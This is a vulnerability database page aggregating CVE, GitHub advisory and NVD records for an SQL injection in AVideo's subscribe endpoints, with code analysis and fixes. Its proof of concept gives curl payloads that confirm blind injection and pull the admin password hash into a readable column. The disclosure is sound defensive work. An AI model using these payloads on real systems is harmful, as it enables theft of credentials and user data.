Vulnerability-Lookup

CVE-2026-33723 (GCVE-0-2026-33723)

Vulnerability from cvelistv5 – Published: 2026-03-23 18:50 – Updated: 2026-03-24 15:13

Title

AVideo Vulnerable to SQL Injection in Subscribe Endpoint via Unsanitized user_id Parameter in subscribe.php

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.

Severity ?

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/36dfae22059…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33723",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T14:43:40.671777Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T15:13:32.510Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this-\u003eusers_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST[\u0027user_id\u0027]` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T18:50:33.566Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c"
        }
      ],
      "source": {
        "advisory": "GHSA-ffr8-fxhv-fv8h",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo Vulnerable to SQL Injection in Subscribe Endpoint via Unsanitized user_id Parameter in subscribe.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33723",
    "datePublished": "2026-03-23T18:50:33.566Z",
    "dateReserved": "2026-03-23T17:34:57.559Z",
    "dateUpdated": "2026-03-24T15:13:32.510Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33723",
      "date": "2026-04-14",
      "epss": "0.00022",
      "percentile": "0.05887"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33723\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T19:16:42.807\",\"lastModified\":\"2026-03-25T19:04:07.503\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this-\u003eusers_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST[\u0027user_id\u0027]` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el m\u00e9todo `Subscribe::save()` en `objects/subscribe.php` concatena la propiedad `$this-\u0026gt;users_id` directamente en una consulta SQL INSERT sin saneamiento o vinculaci\u00f3n parametrizada. Esta propiedad se origina de `$_POST[\u0027user_id\u0027]` tanto en `subscribe.json.php` como en `subscribeNotify.json.php`. Un atacante autenticado puede inyectar SQL arbitrario para extraer datos sensibles de cualquier tabla de base de datos, incluyendo hashes de contrase\u00f1as, claves API y sales de cifrado. El commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33723\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T14:43:40.671777Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T14:43:55.916Z\"}}], \"cna\": {\"title\": \"AVideo Vulnerable to SQL Injection in Subscribe Endpoint via Unsanitized user_id Parameter in subscribe.php\", \"source\": {\"advisory\": \"GHSA-ffr8-fxhv-fv8h\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c\", \"name\": \"https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this-\u003eusers_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST[\u0027user_id\u0027]` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T18:50:33.566Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33723\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T15:13:32.510Z\", \"dateReserved\": \"2026-03-23T17:34:57.559Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T18:50:33.566Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-FFR8-FXHV-FV8H

Vulnerability from github – Published: 2026-03-25 21:56 – Updated: 2026-03-25 21:56

Summary

AVideo is Vulnerable to SQL Injection through Subscribe Endpoint via Unsanitized user_id Parameter

Details

Summary

The Subscribe::save() method in objects/subscribe.php concatenates the $this->users_id property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from $_POST['user_id'] in both subscribe.json.php and subscribeNotify.json.php. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.

Details

The vulnerability exists because of a disconnect between where intval() is applied and where the value is used in SQL.

Entry points — objects/subscribe.json.php:40 and objects/subscribeNotify.json.php:23:

// subscribe.json.php line 40
$subscribe = new Subscribe(0, $_POST['email'], $_POST['user_id'], User::getId());

Constructor stores raw value — objects/subscribe.php:34:

public function __construct($id, $email = "", $user_id = "", $subscriber_users_id = "")
{
    // ...
    $this->users_id = $user_id;  // Raw $_POST['user_id'], no sanitization
    $this->subscriber_users_id = $subscriber_users_id;
    if (empty($this->id)) {
        $this->loadFromId($this->subscriber_users_id, $user_id, "");
    }
}

getSubscribeFromID sanitizes local copies only — objects/subscribe.php:137-139:

public static function getSubscribeFromID($subscriber_users_id, $user_id, $status = "a"){
    $subscriber_users_id = intval($subscriber_users_id);  // Local variable only
    $user_id = intval($user_id);  // Local variable only — $this->users_id is NOT affected

When getSubscribeFromID finds no matching subscription (the attacker simply targets a user_id they haven't subscribed to), loadFromId() returns false. The object's $this->id remains null, and $this->users_id retains the unsanitized injection payload.

Vulnerable sink — objects/subscribe.php:88:

public function save()
{
    if (!empty($this->id)) {
        // UPDATE path (not reached when $this->id is null)
    } else {
        $this->status = 'a';
        $sql = "INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) 
                VALUES ('{$this->users_id}', ...";  // Direct concatenation of injected value
    }
    $saved = sqlDAL::writeSql($sql);  // Called with NO $formats or $values

sqlDAL::writeSql provides no protection — objects/mysql_dal.php:102:

When called without $formats/$values parameters (as save() does), the eval_mysql_bind() function at line 636 returns true without binding any parameters. The already-concatenated SQL string is passed directly to $global['mysqli']->prepare() and execute(), executing the injection as the prepared statement itself.

PoC

Prerequisites: An authenticated session on the target AVideo instance.

Step 1: Confirm injection with time-based blind SQLi

# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)
# The SLEEP(5) will cause a ~5 second delay confirming injection
curl -s -o /dev/null -w "%{time_total}" \
  -b 'PHPSESSID=VALID_SESSION_ID' \
  -d "user_id=99999'+AND+SLEEP(5)+AND+'1" \
  https://target/objects/subscribe.json.php
# Expected: ~5 second response time (vs <1 second normally)

Step 2: Extract admin password hash via INSERT subquery

# Inject a subquery that reads the admin password hash into the email column
curl -b 'PHPSESSID=VALID_SESSION_ID' \
  -d "user_id=99999',(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),'a','1.1.1.1',now(),now(),'1');%23" \
  https://target/objects/subscribe.json.php

This closes the VALUES clause with attacker-controlled data and comments out the rest of the query. The admin password hash is inserted into the email column of the subscribes table, which can be read back via the subscription list API.

Step 3: Read exfiltrated data

The injected row is readable via any endpoint that queries the subscribes table and returns the email field (e.g., getAllSubscribes()).

The same attack works against objects/subscribeNotify.json.php via the same user_id parameter.

Impact

Full database read access: An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:
User password hashes (users.pass)
Admin credentials
Encryption salts and API keys from configuration tables
Email addresses and personal data of all users
Data integrity: The attacker can insert arbitrary rows into the subscribes table.
Two affected endpoints: Both subscribe.json.php and subscribeNotify.json.php pass raw $_POST['user_id'] to the vulnerable code path.

Recommended Fix

Apply intval() to $this->users_id before use in the constructor, or better yet, use parameterized queries in save().

Option 1 — Sanitize in constructor (minimal fix):

// objects/subscribe.php, constructor (line 34)
- $this->users_id = $user_id;
+ $this->users_id = intval($user_id);

Option 2 — Use parameterized query in save() (recommended):

// objects/subscribe.php, save() method (lines 87-90)
public function save()
{
    global $global;
    if (!empty($this->id)) {
        $sql = "UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?";
        $saved = sqlDAL::writeSql($sql, "sssi", [$this->status, $this->notify, getRealIpAddr(), $this->id]);
    } else {
        $this->status = 'a';
        $sql = "INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, ?, ?, now(), now(), ?)";
        $saved = sqlDAL::writeSql($sql, "isssi", [intval($this->users_id), $this->email, $this->status, getRealIpAddr(), intval($this->subscriber_users_id)]);
    }

Option 2 is strongly recommended as it also fixes the unsanitized $this->email, $this->status, and getRealIpAddr() values in both the INSERT and UPDATE paths, preventing any future injection through those fields.

Severity ?

7.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33723"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T21:56:12Z",
    "nvd_published_at": "2026-03-23T19:16:42Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this-\u003eusers_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST[\u0027user_id\u0027]` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.\n\n## Details\n\nThe vulnerability exists because of a disconnect between where `intval()` is applied and where the value is used in SQL.\n\n**Entry points** \u2014 `objects/subscribe.json.php:40` and `objects/subscribeNotify.json.php:23`:\n\n```php\n// subscribe.json.php line 40\n$subscribe = new Subscribe(0, $_POST[\u0027email\u0027], $_POST[\u0027user_id\u0027], User::getId());\n```\n\n**Constructor stores raw value** \u2014 `objects/subscribe.php:34`:\n\n```php\npublic function __construct($id, $email = \"\", $user_id = \"\", $subscriber_users_id = \"\")\n{\n    // ...\n    $this-\u003eusers_id = $user_id;  // Raw $_POST[\u0027user_id\u0027], no sanitization\n    $this-\u003esubscriber_users_id = $subscriber_users_id;\n    if (empty($this-\u003eid)) {\n        $this-\u003eloadFromId($this-\u003esubscriber_users_id, $user_id, \"\");\n    }\n}\n```\n\n**`getSubscribeFromID` sanitizes local copies only** \u2014 `objects/subscribe.php:137-139`:\n\n```php\npublic static function getSubscribeFromID($subscriber_users_id, $user_id, $status = \"a\"){\n    $subscriber_users_id = intval($subscriber_users_id);  // Local variable only\n    $user_id = intval($user_id);  // Local variable only \u2014 $this-\u003eusers_id is NOT affected\n```\n\nWhen `getSubscribeFromID` finds no matching subscription (the attacker simply targets a user_id they haven\u0027t subscribed to), `loadFromId()` returns false. The object\u0027s `$this-\u003eid` remains null, and `$this-\u003eusers_id` retains the unsanitized injection payload.\n\n**Vulnerable sink** \u2014 `objects/subscribe.php:88`:\n\n```php\npublic function save()\n{\n    if (!empty($this-\u003eid)) {\n        // UPDATE path (not reached when $this-\u003eid is null)\n    } else {\n        $this-\u003estatus = \u0027a\u0027;\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) \n                VALUES (\u0027{$this-\u003eusers_id}\u0027, ...\";  // Direct concatenation of injected value\n    }\n    $saved = sqlDAL::writeSql($sql);  // Called with NO $formats or $values\n```\n\n**`sqlDAL::writeSql` provides no protection** \u2014 `objects/mysql_dal.php:102`:\n\nWhen called without `$formats`/`$values` parameters (as `save()` does), the `eval_mysql_bind()` function at line 636 returns `true` without binding any parameters. The already-concatenated SQL string is passed directly to `$global[\u0027mysqli\u0027]-\u003eprepare()` and `execute()`, executing the injection as the prepared statement itself.\n\n## PoC\n\n**Prerequisites:** An authenticated session on the target AVideo instance.\n\n**Step 1: Confirm injection with time-based blind SQLi**\n\n```bash\n# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)\n# The SLEEP(5) will cause a ~5 second delay confirming injection\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n  -b \u0027PHPSESSID=VALID_SESSION_ID\u0027 \\\n  -d \"user_id=99999\u0027+AND+SLEEP(5)+AND+\u00271\" \\\n  https://target/objects/subscribe.json.php\n# Expected: ~5 second response time (vs \u003c1 second normally)\n```\n\n**Step 2: Extract admin password hash via INSERT subquery**\n\n```bash\n# Inject a subquery that reads the admin password hash into the email column\ncurl -b \u0027PHPSESSID=VALID_SESSION_ID\u0027 \\\n  -d \"user_id=99999\u0027,(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),\u0027a\u0027,\u00271.1.1.1\u0027,now(),now(),\u00271\u0027);%23\" \\\n  https://target/objects/subscribe.json.php\n```\n\nThis closes the `VALUES` clause with attacker-controlled data and comments out the rest of the query. The admin password hash is inserted into the `email` column of the `subscribes` table, which can be read back via the subscription list API.\n\n**Step 3: Read exfiltrated data**\n\nThe injected row is readable via any endpoint that queries the `subscribes` table and returns the `email` field (e.g., `getAllSubscribes()`).\n\nThe same attack works against `objects/subscribeNotify.json.php` via the same `user_id` parameter.\n\n## Impact\n\n- **Full database read access:** An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:\n  - User password hashes (`users.pass`)\n  - Admin credentials\n  - Encryption salts and API keys from configuration tables\n  - Email addresses and personal data of all users\n- **Data integrity:** The attacker can insert arbitrary rows into the `subscribes` table.\n- **Two affected endpoints:** Both `subscribe.json.php` and `subscribeNotify.json.php` pass raw `$_POST[\u0027user_id\u0027]` to the vulnerable code path.\n\n## Recommended Fix\n\nApply `intval()` to `$this-\u003eusers_id` before use in the constructor, or better yet, use parameterized queries in `save()`.\n\n**Option 1 \u2014 Sanitize in constructor** (minimal fix):\n\n```php\n// objects/subscribe.php, constructor (line 34)\n- $this-\u003eusers_id = $user_id;\n+ $this-\u003eusers_id = intval($user_id);\n```\n\n**Option 2 \u2014 Use parameterized query in save()** (recommended):\n\n```php\n// objects/subscribe.php, save() method (lines 87-90)\npublic function save()\n{\n    global $global;\n    if (!empty($this-\u003eid)) {\n        $sql = \"UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?\";\n        $saved = sqlDAL::writeSql($sql, \"sssi\", [$this-\u003estatus, $this-\u003enotify, getRealIpAddr(), $this-\u003eid]);\n    } else {\n        $this-\u003estatus = \u0027a\u0027;\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, ?, ?, now(), now(), ?)\";\n        $saved = sqlDAL::writeSql($sql, \"isssi\", [intval($this-\u003eusers_id), $this-\u003eemail, $this-\u003estatus, getRealIpAddr(), intval($this-\u003esubscriber_users_id)]);\n    }\n```\n\nOption 2 is strongly recommended as it also fixes the unsanitized `$this-\u003eemail`, `$this-\u003estatus`, and `getRealIpAddr()` values in both the INSERT and UPDATE paths, preventing any future injection through those fields.",
  "id": "GHSA-ffr8-fxhv-fv8h",
  "modified": "2026-03-25T21:56:12Z",
  "published": "2026-03-25T21:56:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33723"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo is Vulnerable to SQL Injection through Subscribe Endpoint via Unsanitized user_id Parameter"
}

FKIE_CVE-2026-33723

Vulnerability from fkie_nvd - Published: 2026-03-23 19:16 - Updated: 2026-03-25 19:04

Severity ?

7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this-\u003eusers_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST[\u0027user_id\u0027]` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el m\u00e9todo `Subscribe::save()` en `objects/subscribe.php` concatena la propiedad `$this-\u0026gt;users_id` directamente en una consulta SQL INSERT sin saneamiento o vinculaci\u00f3n parametrizada. Esta propiedad se origina de `$_POST[\u0027user_id\u0027]` tanto en `subscribe.json.php` como en `subscribeNotify.json.php`. Un atacante autenticado puede inyectar SQL arbitrario para extraer datos sensibles de cualquier tabla de base de datos, incluyendo hashes de contrase\u00f1as, claves API y sales de cifrado. El commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contiene un parche."
    }
  ],
  "id": "CVE-2026-33723",
  "lastModified": "2026-03-25T19:04:07.503",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-23T19:16:42.807",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
